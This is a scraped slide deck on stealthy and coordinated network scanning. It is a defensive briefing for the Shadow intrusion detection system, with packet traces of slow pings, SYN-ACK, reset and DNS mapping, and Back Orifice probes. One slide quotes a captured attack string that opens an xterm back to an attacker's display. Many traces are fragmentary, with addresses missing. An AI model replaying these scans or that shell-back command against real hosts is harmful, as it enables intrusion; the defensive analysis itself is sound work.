Internet Threat Briefing Stealth and Coordinated Probes and Attacks Shadow.

Slides:



Advertisements
Similar presentations
Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.
Advertisements

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
CISCO NETWORKING ACADEMY Chabot College ELEC Transport Layer (4)
NMAP Scanning Options. EC-Council NMAP  Nmap is the most popular scanning tool used on the Internet.  Cretead by Fyodar ( it.
UDP & TCP Where would we be without them!. UDP User Datagram Protocol.
1 Reading Log Files. 2 Segment Format
Table of Contents 3 - IDS types 8 - Ethernet Frame 9 - IP frame 10 - TCP frame 11 - UDP frame 12 - ICMP Frame way handshake 15 - TCP flags 16 -
IP Network Scanning.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Last updated
Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.
Firewalls and Intrusion Detection Systems
Internet Control Message Protocol (ICMP)
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
Scanning February 23, 2010 MIS 4600 – MBA © Abdou Illia.
Information Networking Security and Assurance Lab National Chung Cheng University COUNTER HACK Chapter 6 Scanning Information Networking Security and Assurance.
TCP/IP Network and Firewall. IP Packet Protocol  1 ICMP packet  6 TCP packet  17 UDP packet.
Port Scanning Yiqian Zhang CS 265 Project. What is Port Scanning? port scanning is equivalent to knocking on the walls to find all the doors and windows.
FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 6 Packet Filtering By Whitman, Mattord, & Austin© 2008 Course Technology.
Lecture 8 Modeling & Simulation of Communication Networks.
Port Scanning.
IST 228\Ch3\IP Addressing1 TCP/IP and DoD Model (TCP/IP Model)
Support Protocols and Technologies. Topics Filling in the gaps we need to make for IP forwarding work in practice – Getting IP addresses (DHCP) – Mapping.
Ana Chanaba Robert Huylo
Internet Control Message Protocol ICMP. ICMP has two major purposes: –To report erroneous conditions –To diagnose network problems ICMP has two major.
Packet Filtering. 2 Objectives Describe packets and packet filtering Explain the approaches to packet filtering Recommend specific filtering rules.
FIREWALL Mạng máy tính nâng cao-V1.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 8 – Denial of Service.
Network Protocols. Why Protocols?  Rules and procedures to govern communication Some for transferring data Some for transferring data Some for route.
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
1 IP: putting it all together Part 2 G53ACC Chris Greenhalgh.
Chapter 6: Packet Filtering
Part 2  Access Control 1 CAPTCHA Part 2  Access Control 2 Turing Test Proposed by Alan Turing in 1950 Human asks questions to another human and a computer,
Firewalls A note on the use of these ppt slides:
Protocol(TCP/IP, HTTP) 송준화 조경민 2001/03/13. Network Computing Lab.2 Layering of TCP/IP-based protocols.
A day in the life: scenario
CIS 450 – Network Security Chapter 3 – Information Gathering.
Link Layer 5-1 Link layer, LAN s: outline 5.1 introduction, services 5.2 error detection, correction 5.3 multiple access protocols 5.4 LANs  addressing,
POSTECH DP&NM Lab. Internet Traffic Monitoring and Analysis: Methods and Applications (1) 4. Active Monitoring Techniques.
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
 network appliances to filter network traffic  filter on header (largely based on layers 3-5) Internet Intranet.
Chapter 2 Scanning Last modified Determining If The System Is Alive.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
Scanning & Enumeration Lab 3 Once attacker knows who to attack, and knows some of what is there (e.g. DNS servers, mail servers, etc.) the next step is.
1 Firewalls Types of Firewalls Inspection Methods  Static Packet Inspection  Stateful Packet Inspection  NAT  Application Firewalls Firewall Architecture.
1 CSCD434 Lecture 7 Spring 2012 Scanning Activities Network Mapping and Scanning.
Advanced Packet Analysis and Troubleshooting Using Wireshark 23AF
Chapter 8 Network Security Thanks and enjoy! JFK/KWR All material copyright J.F Kurose and K.W. Ross, All Rights Reserved Computer Networking:
DoS/DDoS attack and defense
An Analysis of Using Reflectors for Distributed Denial-of- Service Attacks Paper by Vern Paxson.
UDP & TCP Where would we be without them!. UDP User Datagram Protocol.
Scanning.
Lecture 21: Network Primer 7/9/2003 CSCE 590 Summer 2003.
Network and Port Scanning Chien-Chung Shen
Port Scanning James Tate II
A Typical Connection Scenario
Port Scanning (based on nmap tool)
TCP/IP Internetworking
Firewall – Survey Purpose of a Firewall Characteristic of a firewall
8 Network Layer Part V Computer Networks Tutun Juhana
TCP/IP Internetworking
Module 18 (More Network Discovery)
Byungchul Park ICMP & ICMPv DPNM Lab. Byungchul Park
Overview of Networking & Operating System Security
Internet Control Message Protocol (ICMP)
Chapter 6 The Data Link layer
Internet Control Message Protocol
46 to 1500 bytes TYPE CODE CHECKSUM IDENTIFIER SEQUENCE NUMBER OPTIONAL DATA ICMP Echo message.
Session 20 INST 346 Technologies, Infrastructure and Architecture
Presentation transcript:

Internet Threat Briefing Stealth and Coordinated Probes and Attacks Shadow

Subtle and Stealthy Attacks These attacks typically fall below the noise threshold on a network and are consequently difficult to detect. The hostile connections are embedded within a large volume of identical traffic that is too massive to realistically process without specialized techniques.

Stealthy Ping Mapping ( Slow scan to evade detection) APR 21 -> 18:41: srn.org> : icmp: echo request 18:41: srn.org> : icmp: echo request 19:32: srn.org> : icmp: echo request 19:32: srn.org> : icmp: echo request 21:29: srn.org> : icmp: echo request 21:30: srn.org> : icmp: echo request 22:23: srn.org> : icmp: echo request 22:23: srn.org> : icmp: echo request APR 22 01:11: srn.org> : icmp: echo request 01:11: srn.org> : icmp: echo request 02:11: srn.org> : icmp: echo request 02:11: srn.org> : icmp: echo request NOTE: They are mapping 2 sites

FTP Bounce (One hop beyond traceback) date time source IP src port dest IP dest port 04/27/98 10:17: t 04/27/98 10:27: t 05/06/98 06:34: t 05/06/98 09:12: t 05/06/98 09:15: t 05/06/98 10:11: t

FTP Protocol Service (Illustrated) FTP SYN Ack Syn/Ack Client Step 1 Establish FTP Control Port (21) connection Server Step 2 Use FTP PORT command to prepare or data xfer PORT give IP Address and (high) port number FTP PORT FTP Data FTP Data

Brief (two slide) TCP Review

TCP 3 Way Handshake A -- SYN --> B B --SYN/ACK--> A A -- ACK --> B TCP connections are established after handshake completion

01:46:06.41 attacker > target.domain: S : (0) win :46:06.42 target.domain > attacker.23616: S : (0) ack win (DF) 01:46:07.14 attacker > target.domain:. ack 1 win (DF) TCP 3 Way Handshake 1) SYN, 2) SYN/ACK, 3) ACK

Stealthy Network Mapping Using TCP SYN-ACK packets 06:41: stealth.mappem.com.113 > : S : (0) ack win :42: stealth.mappem.com.113 > : S : (0) ack win :42: stealth.mappem.com.113 > : S : (0) ack win :43: stealth.mappem.com.113 > : S : (0) ack win 8192 Stimulus-Response Pair responds with a reset 06:44: stealth.mappem.com.113 > : S : (0) ack win :44: > stealth.mappem.com.113: R : (0) win 0 The initiating SYN connections were never sent, but SYN-ACKs are received.

Stealthy Network Mapping Using TCP Reset Packets 02:58: stealth.mappem.com > : R 0:0(0) ack win 0 02:59: stealth.mappem.com > : R 0:0(0) ack win 0 02:59: stealth.mappem.com > : R 0:0(0) ack win 0 02:59: stealth.mappem.com.7960 > : R 0:0(0) ack win 0 02:59: stealth.mappem.com > : R 0:0(0) ack win 0 03:00: stealth.mappem.com.8986 > : R 0:0(0) ack win 0 03:00: stealth.mappem.com > : R 0:0(0) ack win 0 03:00: router.mynet.net > stealth.mappem.com: icmp: host unreachable Stimulus-Response Pair The attacker is sending Reset packets to close connections that were never established.

Stealthy Network Mapping Using Inverse Domain Queries 05:55: stealth.com.domain > : udp 06:46: stealth.com.domain > : udp 07:36: stealth.com.domain > : udp 07:57: stealth.com.domain > : udp 09:55: stealth.com.domain > : udp 10:38: stealth.com.domain > : udp 10:40: stealth.com.domain > : udp 10:44: stealth.com.domain > : udp 11:35: stealth.com.domain > : udp Stimulus-Response Pair 11:35: stealth.com.domain > : udp 11:35: router.mynet.net > stealth.com: icmp: host unreachable The attacker is sending responses to questions that were never posed. clientserver Port X Port 53 query response Normal DNS Query

Stealthy Network Mapping Using fragmented IP Datagrams wo zero offset 18:32: A > B.71: (frag 18:32: A > B.72: (frag 18:32: A > B.73: (frag 18:32: A > B.74: (frag 18:32: A > B.75: (frag 18:32: A > B.76: (frag 18:32: A > B.77: (frag 18:32: A > B.78: (frag 18:32: A > B.79: (frag

Stealthy Socks Scan (Time delay possibly with signature port) 08:17:56 A > B : S : (0) win :27:16 A > B : S : (0) win 242 Stimulus-Response Pair 08:36:36 A > B : S : (0) win :36:36 B.4.5 > A: icmp: host B.3.1 unreachable 08:55:16 A > B : S : (0) win :04:36 A > B : S : (0) win :32:36 A > B : S : (0) win :51:15 A > B : S : (0)win 242

Scanning by a Service Provider

Customized Web Content 07:36:55.73 ad.pref > firewall.22: S 14974:14974(12) win (DF) 07:37:21.80 media.pref > firewall.22: S 14022:14022(536) win (DF) 07:37:53.63 media.pref > firewall.22: S 18985:18985(536) win (DF) 07:38:00.61 media.pref > firewall.119: S 9899:9899(536) win (DF) Two days later: 10:48:00.61 media.pref > firewall.80: S 9679:9678(536) win (DF) In the noise of supplying web content, provider is testing for open ports on the firewall

Customized Web Content (2) Malformed packet, note SYN/RESET/FIN all set as is urgent: 10:47:36 pref.2048 > fwl.48579: SFR 0:0(508) ack 2642 win 768 urg 2571 (DF) 11:23:42 pref.2048 > fw.47720: SFP 0:0(544) win 3840 urg 2571 (DF) 13:49:44 pref > fw.1591: SFRP 0:0(36) ack win 0 urg 0 (DF) Related activity not from preferences: 13:37:30 i.com > fwl.22555: SF 0:0(556) win (DF) 14:52:57 demon.uk > fwl.16940: SFRP 0:0(528) ack 200 win urg 169 (DF) 14:53:01 demon.uk > fw.556: SFRP 0:0(528) ack 21 win 556 urg 556 (DF)

Coordinated Attacks (multiple attackers working together to increase their stealth and firepower)

External Network Mapping 10:32: north.mappem.com > ns.target.net.33476: udp 12 10:32: north.mappem.com > ns.target.net.33477: udp 12 10:32: north.mappem.com > ns.target.net.33478: udp 12 10:32: north.mappem.com > ns.target.net.33479: udp 12 10:32: north.mappem.com > ns.target.net.33481: udp 12 10:32: north.mappem.com > ns.target.net.33482: udp 12 10:32: north.mappem.com > ns.target.net.33484: udp 12 10:32: south.mappem.com > ns.target.net.33510: udp 12 10:32: south.mappem.com > ns.target.net.33512: udp 12 10:32: south.mappem.com > ns.target.net.33513: udp 12 10:32: south.mappem.com > ns.target.net.33514: udp 12 10:32: south.mappem.com > ns.target.net.33515: udp 12 10:32: south.mappem.com > ns.target.net.33517: udp 12 10:32: south.mappem.com > ns.target.net.33519: udp 12 10:32: east.mappem.com > ns.target.net.33490: udp 12 10:32: east.mappem.com > ns.target.net.33491: udp 12 10:32: east.mappem.com > ns.target.net.33493: udp 12 10:32: east.mappem.com > ns.target.net.33494: udp 12 10:32: east.mappem.com > ns.target.net.33495: udp 12 10:32: east.mappem.com > ns.target.net.33496: udp 12 10:32: east.mappem.com > ns.target.net.33498: udp 12 10:32: east.mappem.com > ns.target.net.33499: udp 12 Simultaneous Traceroutes

Protected Network External Network Mapping Concept ISP # 2 ISP # 1 Goal is to determine what machines make up the external layer of the protected network. = Internet Router

Searching for Back Orifice 04:10: dax.no.1534 > TARGETBa.31337: udp 19 04:51: cpu.com.1534 > TARGETBb.31337: udp 19 04:54: dax.no.1534 > TARGETBc.31337: udp 19 06:51: dax.no.1534 > TARGETAa.31337: udp 19 06:52: cpu.com.1534 > TARGETAb.31337: udp 19 06:06: eb.net.1534 > TARGETAc.31337: udp 19

Simultaneous RESET Scans By Related Addresses 17:40: hook > target1.1457: R 0:0(0) ack win 0 17:40: hook > target2.1457: R 0:0(0) ack win 0 17:41: hook > target3.1979: R 0:0(0) ack win 0 17:43: router > hook: icmp: time exceeded in-transit 17:43: hook > target4.1496: R 0:0(0) ack win 0 17:42: grin.3532 > target1a.1167: R 0:0(0) ack win 0 17:42: grin > target2a.1797: R 0:0(0) ack win 0 17:44: grin > target3a.1634: R 0:0(0) ack win 0 17:47: grin > target4a.2121: R 0:0(0) ack win 0 17:47: router > grin: icmp: time exceeded in-transit

Protected Network Synchronized Reset Network Mapping Concept ISP # 2 ISP # 1 Four related ISPs with DIFFERENT IP addresses families split target address space and jointly attack at < 5 packet/hr = Internet Router ISP # 3 ISP # 4

DNS Zone 07:15:17.56 ATTACKERA > TARGETA.domain: S : (0) ack win :15:17.56 ATTACKERB.domain > TARGETA.domain: S : (0) ack win :15:17.57 TARGETA.domain > ATTACKERB.domain: R : (0) win :11:13.04 ATTACKERA > TARGETB.domain: S : (0) ack win :11:13.47 ATTACKERB.domain > TARGETB.domain: S : (0) ack win :11:13.48 TARGETB.domain > ATTACKERB.domain: R : (0) win 32768

DNS ZONE Variation One IP attacks, the second IP receives the data 01:46:06.41 attacker > target.domain: S : (0) win :46:06.42 target.domain > attacker.23616: S : (0) ack win (DF) 01:46:07.14 attacker > target.domain:. ack 1 win (DF) 01:46:07.34 attacker > target.domain: P 1:3(2) ac k 1 win (DF) 01:46:07.51 target.domain > attacker.23616:. ack 3 win (DF) 01:46:07.58 attacker > target.domain:. 3:1463(14 60) ack 1 win (DF) 01:46:07.61 attacker > target.domain: P 1463:1563 (100) ack 1 win (DF) 01:46:07.61 attacker > target.domain: F 1563:1563 (0) ack 1 win Courtesy Pedro Vazquez - Unicamp

DNS ZONE Variation (2) One IP attacks, the second IP receives the data Courtesy Pedro Vazquez - Unicamp Content from the attack packets (cleaned up of 8bit chars) sent against the dns servers (target): %strings ibm|grep bin /usr/X11R6/bin/xterm -display Attacker2:0

Faux? Coordinated Attack 12/22/98 04:15: A > Webserver 80 12/22/98 04:15: B > Webserver 80 12/22/98 04:15: C > Webserver 80 12/22/98 04:15: D > Webserver 80 12/22/98 04:15: E > Webserver 80 12/22/98 04:15:03 9CA0000B A > Webserver 80 12/22/98 04:15:03 9CA0000B B > Webserver 80 12/22/98 04:15:03 9CA0000B C > Webserver 80 12/22/98 04:15:03 9CA0000B D > Webserver 80 12/22/98 04:15:03 9CA0000B E > Webserver 80 12/22/98 04:15:04 11A80013 A > Webserver 80 12/22/98 04:15:04 11A80013 B > Webserver 80 12/22/98 04:15:04 11A80013 C > Webserver 80 12/22/98 04:15:04 11A80013 D > Webserver 80 12/22/98 04:15:04 11A80013 E > Webserver 80

Why These Attacks Can Not Be Detected (By current IDS offerings) Minimal correlation capability - current systems cannot evaluation multiple sensor data well Stealthed exploits avoid signature and rule based analysis - encrypted viruses all over again Low scan rate packets/day is very hard to detect when you receive millions

How Shadow Detects These Multiple sensor - single analysis architecture makes correlation easier Pattern based instead of signature or rule based Looks for anything odd Tallies, 24 hour tool recently added to supplement 1 hour tool

Fusion/Correlation Approach (Without improved tools we will fail to track the next level of attacker capability) SensorsAnalysisDatabase When a Shadow analyst sees a detect, they can “fire and forget” report, leaving it to the database (which has access to raw data) to search for like IP addresses or patterns. A B Shadow helps the analyst be all they can be

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.